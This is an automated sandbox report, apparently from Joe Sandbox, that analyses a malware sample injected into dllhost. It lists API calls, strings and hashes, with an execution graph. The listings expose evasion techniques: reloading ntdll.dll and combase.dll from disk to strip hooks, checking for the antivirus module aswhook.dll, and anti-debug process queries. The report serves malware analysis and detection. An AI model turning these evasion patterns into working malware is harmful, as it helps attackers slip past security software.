                                                                                  • Instruction ID: 655ff7b5c7c5c71ba97002844d33cd082e3dd3983b27eb1cf9843771e78190e1
                                                                                  • Opcode Fuzzy Hash: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction Fuzzy Hash: 7CF0A462B0232CBBDB1127955D4ABEF7A5C8BC13D5F240625FD11A2101E6F68ED182A5
                                                                                  Function 7FE31F30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(aswhook.dll,7FE31BBA), ref: 7FE31F35
                                                                                  • DisableThreadLibraryCalls.KERNEL32(00000000), ref: 7FE31F40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallsDisableHandleLibraryModuleThread
                                                                                  • String ID: aswhook.dll
                                                                                  • API String ID: 78584604-2561582699
                                                                                  • Opcode ID: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction ID: ebe0215c953d00e54fa583c8f1e870bcfd19df2d92563f2361f67c6791dd81a8
                                                                                  • Opcode Fuzzy Hash: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction Fuzzy Hash: CAB012BDF002045BBE101F734B0CB0935AF6F8237335482D46883D9000CF24C014CD20
                                                                                  Function 0041657B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CommandLine
                                                                                  • String ID: `%Y
                                                                                  • API String ID: 3253501508-1305619333
                                                                                  • Opcode ID: e5990b29f5a5e9ce6418ab010db1805e29f90e0b11b3835c69642d526e1bb74b
                                                                                  • Instruction ID: 98a73f295352f78eca6e04e9ef2d2915b2518b678ca3f8bdeed1dc2aaa974d3b
                                                                                  • Opcode Fuzzy Hash: e5990b29f5a5e9ce6418ab010db1805e29f90e0b11b3835c69642d526e1bb74b
                                                                                  • Instruction Fuzzy Hash: E7B092789022408FC720AF30BA0C1183BB0B7182023C0E07AD802C3BB0DB750013DF08

                                                                                  Executed Functions

                                                                                  Function 7FE319AC Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE319B9
                                                                                    • Part of subcall function 7FE31BC0: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                    • Part of subcall function 7FE31BC0: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNEL32(7FE319D1), ref: 7FE31D10
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE319E5
                                                                                  • memcpy.MSVCRT(Function_00000000,00000000,?), ref: 7FE31A93
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE31AC5
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE31B09
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE31B17
                                                                                  • memcmp.MSVCRT(?,00000000,?), ref: 7FE31B26
                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,00001000,00000040,?), ref: 7FE31B5B
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 7FE31B98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$FileHandleRead$CurrentModuleProcessVirtual$AddressAllocCloseCreateEnvironmentExpandFreeProcSizeStringsfreemallocmemcmp
                                                                                  • String ID: %Systemroot%\system32\combase.dll$%Systemroot%\system32\ntdll.dll$ZwProtectVirtualMemory$combase.dll$ntdll.dll
                                                                                  • API String ID: 288383237-3427567192
                                                                                  • Opcode ID: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction ID: e13732920362c93adadf7f955773acdb4f5f8b940de6f6bd2b25e23fa99a90bd
                                                                                  • Opcode Fuzzy Hash: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction Fuzzy Hash: 4851B375D00319EFDF118FA5C888EEEB7BAEF84335F90415EE802A6140E7396A44CB61
                                                                                  Function 7FE31C06 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99filememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                  • malloc.MSVCRT ref: 7FE31C67
                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                  • memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                  • memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                  • free.MSVCRT ref: 7FE31D06
                                                                                  • CloseHandle.KERNEL32(7FE319D1), ref: 7FE31D10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$memcpy$AllocCloseCreateEnvironmentExpandHandleReadSizeStringsVirtualfreemalloc
                                                                                  • String ID: MZ
                                                                                  • API String ID: 674188835-2410715997
                                                                                  • Opcode ID: 226944550cf8b9c8bf3112644910aa94d62cb1f495bc6e49e34df98963ec1635
                                                                                  • Instruction ID: 37ed921750a05b1c156510011ba82f53be2a36d11858f4e25eb232333dd4bf60
                                                                                  • Opcode Fuzzy Hash: 226944550cf8b9c8bf3112644910aa94d62cb1f495bc6e49e34df98963ec1635
                                                                                  • Instruction Fuzzy Hash: 7C31C3BAD00208EFCB208F95CC8CEDEBBBDEF45726F604459F94696140D774AA94DB60
                                                                                  Function 005F0273 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 232memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 005F0391
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000040), ref: 005F04A1
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005F050B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749810570.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_5f0000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Alloc$Free
                                                                                  • String ID: !$S$k
                                                                                  • API String ID: 3668210933-1352728671
                                                                                  • Opcode ID: 9b9b3c59536dfe2ac67a7b67f04a7fb9125a8182ea0d4415f552f70be9e8cc3c
                                                                                  • Instruction ID: 57dfc49f99a515c9c57209f512ce17b77250d91c4eab088f125a4921bc22a12d
                                                                                  • Opcode Fuzzy Hash: 9b9b3c59536dfe2ac67a7b67f04a7fb9125a8182ea0d4415f552f70be9e8cc3c
                                                                                  • Instruction Fuzzy Hash: 32915F71D0021AEBDF24CF94C894BBEBBB5BF44304F089559EA55A7282D7B8E944CF60
                                                                                  Function 7FE31D81 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(7FE31BB3,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31D8C
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31DA1
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNEL32(7FE319D1), ref: 7FE31D10
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E42
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E4E
                                                                                    • Part of subcall function 7FE31EEA: memcmp.MSVCRT(7FE31BB3,7FE31E6D,7FE31E6D,7FE31BB3,?,00000080,?,7FE31E6D,7FE31BB3,7FE31BB3,00000080,?,?,?,00000000), ref: 7FE31F0D
                                                                                  • memcpy.MSVCRT(7FE31BB3,7FE31BB3,?,?,?,00001000,00000040,00000004,?,?,?,?,?,?,00000000), ref: 7FE31EA2
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll), ref: 7FE31EDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileReadmemcpy$HandleVirtual$AllocCloseCreateCurrentEnvironmentExpandFreeModuleProcessSizeStringsfreemallocmemcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1807237107-0
                                                                                  • Opcode ID: 65760951e2fbb1f37c2ca01f434e78f1b247da36f8d6a80a04fa196cab3b0387
                                                                                  • Instruction ID: e66e30e26c8d651dff7f802cc7b867a7bcfc757d2cd4cd66e8dd7680ebece615
                                                                                  • Opcode Fuzzy Hash: 65760951e2fbb1f37c2ca01f434e78f1b247da36f8d6a80a04fa196cab3b0387
                                                                                  • Instruction Fuzzy Hash: 32416275D00209EFDF019FA6CD88AAEBBBAFF44364F54412EE902E7150E735A954CB60

                                                                                  Non-executed Functions

                                                                                  Function 7FE31BC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                  • API String ID: 1646373207-3024904723
                                                                                  • Opcode ID: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction ID: 54fe31d5977995978b315a9fd433e02c4f518c0bef640df39cf22da13bcb4d8d
                                                                                  • Opcode Fuzzy Hash: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction Fuzzy Hash: E6E03039E0030AAFDB01CBA5CA0DF9DB6BDAF4526AB604159A805D6000E735D614EA10
                                                                                  Function 7FE31064 Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 456COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$combase.dll
                                                                                  • API String ID: 2221118986-1187780485
                                                                                  • Opcode ID: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction ID: 073b19536da68552c2ef516f0e74b594634c8d8f7233081d7479257ca9af4b1c
                                                                                  • Opcode Fuzzy Hash: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction Fuzzy Hash: D702F724C087C599DB168A78805D3EDBFF29F43228F9986CDC4D31BA97C27E6249D352
                                                                                  Function 7FE31F30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(aswhook.dll,7FE31BBA), ref: 7FE31F35
                                                                                  • DisableThreadLibraryCalls.KERNEL32(00000000), ref: 7FE31F40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallsDisableHandleLibraryModuleThread
                                                                                  • String ID: aswhook.dll
                                                                                  • API String ID: 78584604-2561582699
                                                                                  • Opcode ID: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction ID: ebe0215c953d00e54fa583c8f1e870bcfd19df2d92563f2361f67c6791dd81a8
                                                                                  • Opcode Fuzzy Hash: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction Fuzzy Hash: CAB012BDF002045BBE101F734B0CB0935AF6F8237335482D46883D9000CF24C014CD20

                                                                                  Execution Graph

                                                                                  Execution Coverage:26.7%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:191
                                                                                  Total number of Limit Nodes:4
                                                                                  execution_graph 1354 4f008d lstrcmpiA 1355 4f00a8 LoadLibraryA 1354->1355 1356 4f00a0 1354->1356 1357 7fe410e0 1358 7fe4117c 1357->1358 1360 7fe410fe 1357->1360 1360->1358 1361 7fe4103b RtlUnwind 1360->1361 1361->1360 1373 7fe433c3 GetProcAddress 1157 7fe420ec LoadLibraryA 1158 7fe4344e lstrcmpiA 1159 7fe43461 1158->1159 1160 7fe43469 LoadLibraryA 1158->1160 1374 4f02a2 LoadLibraryW 1375 4f02bc 1374->1375 1380 4f02ee 1374->1380 1376 4f02de 1375->1376 1377 4f02f8 1375->1377 1381 4f01c5 GetProcAddress 1376->1381 1377->1380 1383 4f0268 GetProcAddress 1377->1383 1382 4f01e5 1381->1382 1382->1380 1384 4f027e 1383->1384 1384->1380 1362 7fe422aa NtQueryInformationProcess 1363 7fe422c8 1362->1363 1345 4f0000 1348 4f0009 1345->1348 1350 4f0011 1348->1350 1351 4f0020 1350->1351 1352 4f0036 VirtualFree 1351->1352 1353 4f0041 1351->1353 1352->1353 1385 7fe41915 1386 7fe4192d 1385->1386 1387 7fe4192f memcpy 1385->1387 1386->1387 1368 7fe43430 1369 7fe43439 1368->1369 1370 7fe4344b 1368->1370 1371 7fe4257f lstrlen 1369->1371 1372 7fe43447 1371->1372 1162 7fe42018 1163 7fe42032 1162->1163 1164 7fe4208a 1163->1164 1170 7fe4208f GetPEB 1163->1170 1166 7fe4203e 1166->1164 1172 7fe42233 GetModuleHandleA GetProcAddress 1166->1172 1171 7fe420ae 1170->1171 1171->1166 1173 7fe4227d 1172->1173 1174 7fe42263 GetCurrentProcess NtQueryInformationProcess 1172->1174 1175 7fe42071 SetErrorMode 1173->1175 1176 7fe4228b GetModuleHandleA GetProcAddress 1173->1176 1174->1173 1178 7fe4168c 1175->1178 1191 7fe41e0e GetModuleHandleA GetProcAddress 1176->1191 1211 7fe42459 1178->1211 1186 7fe416cc 1270 7fe416d7 GetModuleHandleA 1186->1270 1190 7fe416c3 1267 7fe4256c 1190->1267 1192 7fe41e36 1191->1192 1196 7fe41ea9 1191->1196 1194 7fe41e81 1192->1194 1192->1196 1197 7fe411b0 memset 1192->1197 1194->1196 1199 7fe41ef2 GetProcAddress 1194->1199 1196->1175 1198 7fe411dc 1197->1198 1198->1192 1200 7fe41f6b 1199->1200 1201 7fe41f0a 1199->1201 1200->1196 1201->1200 1206 7fe41f70 1201->1206 1204 7fe41f33 VirtualProtect 1204->1200 1205 7fe41f4e InterlockedExchange VirtualProtect 1204->1205 1205->1200 1208 7fe41f8f 1206->1208 1209 7fe41f25 1206->1209 1207 7fe411b0 memset 1207->1208 1208->1207 1208->1209 1210 7fe41f70 memset 1208->1210 1209->1200 1209->1204 1210->1208 1212 7fe42470 1211->1212 1213 7fe4169c 1211->1213 1212->1213 1214 7fe424ea calloc 1212->1214 1213->1186 1213->1190 1221 7fe42d84 memset memset 1213->1221 1214->1213 1215 7fe424fb 1214->1215 1276 7fe422d6 1215->1276 1218 7fe4255a free 1218->1213 1219 7fe4252f malloc 1219->1218 1220 7fe42544 memcpy 1219->1220 1220->1218 1280 7fe4257f lstrlen 1221->1280 1223 7fe416b1 1224 7fe41755 1223->1224 1225 7fe4257f lstrlen 1224->1225 1231 7fe41777 1225->1231 1226 7fe418c2 1227 7fe416b8 1226->1227 1282 7fe4194a 1226->1282 1234 7fe42dd5 1227->1234 1230 7fe41804 strncmp 1230->1231 1231->1226 1231->1230 1232 7fe41868 malloc 1231->1232 1232->1231 1233 7fe41879 memcpy 1232->1233 1233->1231 1235 7fe42df0 1234->1235 1236 7fe42e35 1234->1236 1237 7fe43162 1235->1237 1238 7fe42df9 GetModuleHandleA 1235->1238 1236->1190 1237->1236 1243 7fe43198 VirtualAlloc 1237->1243 1292 7fe432d4 1238->1292 1241 7fe42e11 1244 7fe42e18 HeapDestroy 1241->1244 1245 7fe42e2a 1241->1245 1242 7fe42e3c 1242->1236 1248 7fe42e5b IsBadReadPtr 1242->1248 1243->1236 1246 7fe431bf memcpy 1243->1246 1244->1245 1302 7fe436d4 CoInitializeEx 1245->1302 1249 7fe431d8 1246->1249 1258 7fe4320b 1246->1258 1248->1236 1250 7fe42e6d VirtualProtect memcpy VirtualProtect 1248->1250 1251 7fe431e4 memcpy 1249->1251 1249->1258 1252 7fe42eb4 1250->1252 1257 7fe42f1e 1250->1257 1251->1249 1254 7fe42eba VirtualProtect memset 1252->1254 1252->1257 1253 7fe432c2 VirtualFree 1253->1236 1254->1252 1255 7fe42ef5 memcpy 1254->1255 1255->1252 1256 7fe4327e 1256->1253 1261 7fe42f9f 1257->1261 1263 7fe42f7d GetTickCount 1257->1263 1258->1253 1258->1256 1264 7fe4326f GetTickCount 1258->1264 1259 7fe43089 VirtualAlloc 1259->1236 1260 7fe430a4 9 API calls 1259->1260 1260->1236 1262 7fe43030 VirtualProtect 1261->1262 1266 7fe43058 1261->1266 1262->1261 1262->1266 1265 7fe42f8c 1263->1265 1264->1256 1265->1261 1266->1236 1266->1259 1268 7fe42573 free 1267->1268 1269 7fe4257e 1267->1269 1268->1269 1269->1186 1271 7fe416d2 1270->1271 1272 7fe416ec GetProcAddress 1270->1272 1271->1164 1273 7fe41724 GetProcAddress 1272->1273 1274 7fe41707 VirtualProtect VirtualProtect 1272->1274 1273->1271 1275 7fe41733 VirtualProtect VirtualProtect 1273->1275 1274->1273 1275->1271 1277 7fe4236b 1276->1277 1278 7fe422e9 1276->1278 1277->1218 1277->1219 1278->1277 1279 7fe42351 memcpy 1278->1279 1279->1278 1281 7fe425a7 1280->1281 1281->1223 1283 7fe4257f lstrlen 1282->1283 1285 7fe41965 1283->1285 1284 7fe418fb free 1284->1226 1284->1227 1285->1284 1286 7fe41998 VirtualAlloc 1285->1286 1286->1284 1287 7fe419b3 memcpy 1286->1287 1288 7fe419d5 1287->1288 1291 7fe41a05 1287->1291 1289 7fe419de memcpy 1288->1289 1288->1291 1289->1288 1290 7fe41a45 VirtualFree 1290->1284 1291->1290 1293 7fe42e0c 1292->1293 1294 7fe432f3 1292->1294 1293->1241 1293->1242 1294->1293 1295 7fe43310 GetProcessHeap RtlAllocateHeap 1294->1295 1295->1293 1296 7fe43330 memcpy 1295->1296 1297 7fe43381 IsBadReadPtr 1296->1297 1298 7fe43352 1296->1298 1299 7fe433a2 HeapFree 1297->1299 1300 7fe4339b 1297->1300 1298->1297 1301 7fe4335b memcpy 1298->1301 1299->1293 1300->1299 1301->1298 1303 7fe436ef 1302->1303 1307 7fe43931 1302->1307 1303->1307 1322 7fe43663 LoadLibraryW 1303->1322 1306 7fe4376d SafeArrayCreate 1306->1307 1308 7fe4378e memcpy 1306->1308 1307->1236 1310 7fe437c4 1308->1310 1309 7fe4392a SafeArrayDestroy 1309->1307 1310->1309 1311 7fe43811 SafeArrayGetLBound 1310->1311 1318 7fe43915 1310->1318 1312 7fe43828 SafeArrayGetUBound 1311->1312 1315 7fe438b3 1311->1315 1313 7fe4383f 1312->1313 1312->1315 1314 7fe4384c GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 1313->1314 1313->1315 1316 7fe438b5 SafeArrayCreateVector SysAllocString SafeArrayPutElement 1314->1316 1317 7fe43876 1314->1317 1315->1318 1319 7fe43905 SafeArrayDestroy SafeArrayDestroy 1315->1319 1316->1315 1317->1316 1320 7fe4387b SafeArrayCreateVector 1317->1320 1318->1309 1319->1318 1320->1315 1321 7fe4388e SysAllocString SafeArrayPutElement 1320->1321 1321->1315 1321->1321 1323 7fe436af 1322->1323 1324 7fe4367d 1322->1324 1323->1306 1323->1307 1333 7fe434af 1324->1333 1327 7fe434af 5 API calls 1328 7fe43698 1327->1328 1329 7fe4369f 1328->1329 1330 7fe436b9 1328->1330 1341 7fe43586 GetProcAddress 1329->1341 1330->1323 1343 7fe43629 GetProcAddress 1330->1343 1334 7fe434c3 1333->1334 1335 7fe434ca 1333->1335 1334->1327 1335->1334 1336 7fe434d7 GetProcAddress GetProcAddress GetProcAddress 1335->1336 1336->1334 1337 7fe43506 1336->1337 1337->1334 1338 7fe43516 wcscmp 1337->1338 1338->1334 1339 7fe4352d 1338->1339 1339->1334 1340 7fe4353f wcscmp 1339->1340 1340->1334 1342 7fe435a6 1341->1342 1342->1323 1344 7fe4363f 1343->1344 1344->1323 1388 4f00b3 1389 4f00c4 1388->1389 1390 4f00e2 GetProcAddress 1388->1390 1389->1390 1391 4f00d9 1389->1391

                                                                                  Callgraph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  • Opacity -> Relevance
                                                                                  • Disassembly available
                                                                                  callgraph 0 Function_7FE41C64 77 Function_7FE41D0B 0->77 1 Function_7FE410E0 16 Function_7FE4107E 1->16 62 Function_7FE4103B 1->62 2 Function_004F004B 3 Function_7FE426E2 4 Function_7FE43663 49 Function_7FE434AF 4->49 51 Function_7FE43629 4->51 64 Function_7FE43586 4->64 5 Function_7FE420EC 6 Function_7FE4256C 7 Function_7FE4276D 8 Function_7FE452ED 9 Function_004F01C5 10 Function_7FE43474 11 Function_7FE41A75 12 Function_7FE420F7 13 Function_7FE41F70 13->13 55 Function_7FE411B0 13->55 59 Function_7FE41EB3 13->59 14 Function_7FE41EF2 14->13 15 Function_7FE42D72 17 Function_7FE4257F 73 Function_7FE4260F 17->73 18 Function_7FE4237B 19 Function_004F006F 20 Function_7FE426C5 21 Function_004F00EE 22 Function_7FE433C3 23 Function_004F0268 24 Function_7FE4344E 25 Function_7FE451CE 26 Function_7FE460C8 27 Function_7FE42149 71 Function_7FE4220D 27->71 28 Function_7FE4194A 28->0 28->17 40 Function_7FE41A58 28->40 68 Function_7FE41B03 28->68 29 Function_7FE432D4 30 Function_7FE436D4 30->4 31 Function_7FE440D4 32 Function_7FE42DD5 32->0 32->29 32->30 32->68 33 Function_7FE41755 33->17 33->20 33->28 36 Function_7FE427D7 33->36 39 Function_7FE4285D 33->39 83 Function_7FE4281A 33->83 34 Function_7FE422D6 34->18 35 Function_7FE416D7 80 Function_7FE4289F 36->80 37 Function_7FE42D51 37->15 38 Function_7FE433D2 39->80 40->11 41 Function_7FE42459 41->34 42 Function_7FE41DD9 43 Function_7FE451DA 44 Function_7FE4105B 45 Function_004F008D 46 Function_7FE41BA0 47 Function_004F0009 61 Function_004F0011 47->61 48 Function_7FE4502E 50 Function_7FE42729 52 Function_7FE422AA 53 Function_004F0000 53->47 54 Function_7FE451B4 56 Function_7FE43430 56->17 57 Function_7FE440B0 58 Function_7FE42233 72 Function_7FE41E0E 58->72 60 Function_7FE433B8 63 Function_7FE42D84 63->17 65 Function_7FE42107 66 Function_7FE42700 67 Function_7FE40000 67->16 68->40 68->46 69 Function_7FE4168C 69->6 69->32 69->33 69->35 69->41 69->63 70 Function_7FE4340C 72->14 72->55 72->59 74 Function_7FE4208F 74->65 75 Function_004F02A2 75->9 75->21 75->23 76 Function_7FE41D8A 76->42 77->40 77->76 78 Function_7FE41915 79 Function_7FE42796 80->3 80->7 80->37 80->50 80->66 80->79 81 Function_7FE42018 81->0 81->27 81->58 81->68 81->69 81->74 82 Function_004F00B3 83->80 84 Function_7FE4609B

                                                                                  Executed Functions

                                                                                  Function 7FE42233 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 47libraryloadernativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQueryInformationProcess,?,?,?,?,7FE42071), ref: 7FE42251
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE4225A
                                                                                  • GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,?,?,?,7FE42071), ref: 7FE4226F
                                                                                  • NtQueryInformationProcess.NTDLL(00000000,?,?,?,7FE42071), ref: 7FE42276
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwQueryInformationProcess,?,?,?,7FE42071), ref: 7FE42291
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE42294
                                                                                  Strings
                                                                                  Memory Dump Source
